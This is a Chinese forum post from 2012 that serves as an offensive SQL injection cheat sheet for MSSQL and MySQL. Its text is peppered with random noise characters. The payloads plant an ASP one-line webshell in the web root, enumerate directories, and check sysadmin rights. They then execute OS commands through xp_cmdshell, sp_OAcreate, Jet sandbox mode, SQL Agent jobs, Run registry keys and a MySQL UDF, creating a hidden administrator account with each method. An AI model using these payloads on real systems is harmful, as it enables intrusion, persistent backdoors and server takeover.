MSSQL语句导出一句话木马) T- j- m1 L# ^8 J/ Y4 [& t7 Y
首先确定网站的WEB路径
1 z7 M9 p+ x" ~ T, I9 x# e;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马" c* o3 V# b. s* r; q8 ~
( `# e" A2 U( r. h# g# \7 u
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- . y$ A( m6 F+ L/ g
//将一句话木马插入表中. |3 F9 o" V! h- P \- j
m' A1 U) I! o0 {;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
W2 n/ A2 y/ G, Z: b7 N//导出一个ASP文件" ?1 {6 f8 c7 V, h( F
1 O9 ]8 u( b/ A
: g( y0 u& E3 b' J; ]# m" W关于MSSQL列目录& T5 i( h, h0 e- _
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
: K, |0 b+ X# u. F# Z# UInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
& G3 [1 [ Q O; q: m
1 I+ _; Y* L, x7 |% A8 x4 R. W% Xand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
. \5 U, \7 `7 J+ C3 P% F( s( z3 P4 B! B' \0 d% g! ?
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段9 j h7 J: \7 D8 a+ V# x$ J
0 ^. F8 u% u9 w9 f% D r9 J
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
1 ?% A4 e( {5 l* W( ~7 q3 Y$ T U0 ^5 x
, a9 a7 T! `" y6 W# ~) D: a
数据库版本和权限查看4 v7 f5 i& T2 F2 W4 U8 e
and 1=(select @@VERSION) //查看详细的数据库信息.
. I! O3 Y3 ]3 o( N! d2 }and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA% X) W6 a" a" e H- E
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER& Z+ g+ [5 f" V! A* R7 s+ p
' Z9 [' @- p4 L& o. B2 O1 o
8 X$ l: V) L1 ?( C1.利用xp_cmdshell执行命令1 I& w2 c+ @( ?: [; ]( W
exec master..xp_cmdshell 'net user rfire 123456 /add'4 m6 H+ Z& b+ B0 R
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
7 G1 Y3 d0 q( Z- F
2 ~. s/ F5 f4 H3 w) z3 M. x K恢复xp_cmdshell存储过程. r0 Y4 q. b/ G8 ^) N
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' t \1 b$ n% t' b* A2 |6 |
c. \. `2 N! ~: |0 G
; G# N/ V7 [' ?. O q
2.利用SP_OAcreate和SP_OAMETHOD执行命令" t! e8 Z* ]$ J7 S9 ]4 K6 l. m+ C
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
* i0 `3 T9 Z& G' v, rDECLARE @shell INT //建立一个@shell实体
! M4 w* q& |% y$ ^EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例2 c/ }0 c) b7 q% j. p5 e
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例) }* C, X0 |5 S8 H2 }7 ]
2 m, |% k9 r0 s. F3 Y, ?) v; b% q
5 {7 s0 d8 @5 i) ^9 Z5 v3.利用沙盒模式% R# @5 A {' ]& {* p
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
K$ p; v, o; X) H0 g# }0 X6 q+ q+ V开启沙盒模式:9 H6 N E/ W+ f3 E0 x( B; J3 v
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',02 C1 t: S% j/ u$ C4 y# f0 N
9 ?& p3 {8 W4 X! e% e" X
执行命令:' ~6 r) c5 A( `5 }
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
1 ]- b0 y6 k7 {0 M. k8 T, V+ X
+ E4 |' @4 T2 g Q! S- ~4 L' T, M" r! a' f0 L* n
4.利用SQL代理执行命令" r$ u9 }1 [ |; ]1 `; Z
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务+ a( e( X; b+ W8 Q. f
/ W- x- I9 N, m6 ?执行命令:
& U, }% `$ F3 ]use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
$ \ m! `- J0 Y, F1 _' L/ e: mexec sp_add_job 'x': {% P0 x& c4 f8 x6 p) W
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
# m) h* |2 _' I$ ]2 B3 h* U/ ]4 Yexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业! Q% Z* L0 f: n7 d& @3 }
2 _8 k& B6 s( w% ~/ n: j3 \
) E3 N: b% e W1 N3 _. j
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
9 |6 M+ ]6 t) C+ Y q8 H bEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add': t" s4 X8 d( z8 Z! R+ b7 `7 x) v
: ], P. f" S1 Z& s6 A; i- A( T' T- R- f5 c& O( J" ?1 G* O/ K \
6.MYSQL的命令执行/ ~1 j+ Y( h$ K/ h9 o6 }
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)# U3 z4 M4 [) g0 |/ l0 {
首先要在su.php下导出c:\windows\udf.dll& h; X1 N* u% ^* k" L
导出后执行创建自定义函数命令:
) }" _( l+ y* \Create Function cmdshell returns string soname 'udf.dll'
* y9 c4 p* _" \1 w) h3 s) j7 @执行命令3 u1 q& H) o5 y' ~- ^+ `
select cmdshell('net user rfire 123456 /add')
' ^7 G& a3 F2 r1 a6 k执行后删除函数 drop function cmdshell8 H$ d% ?% v" I+ |& |- b
|
发表于 2012-9-13 17:49:59
收藏
支持
反对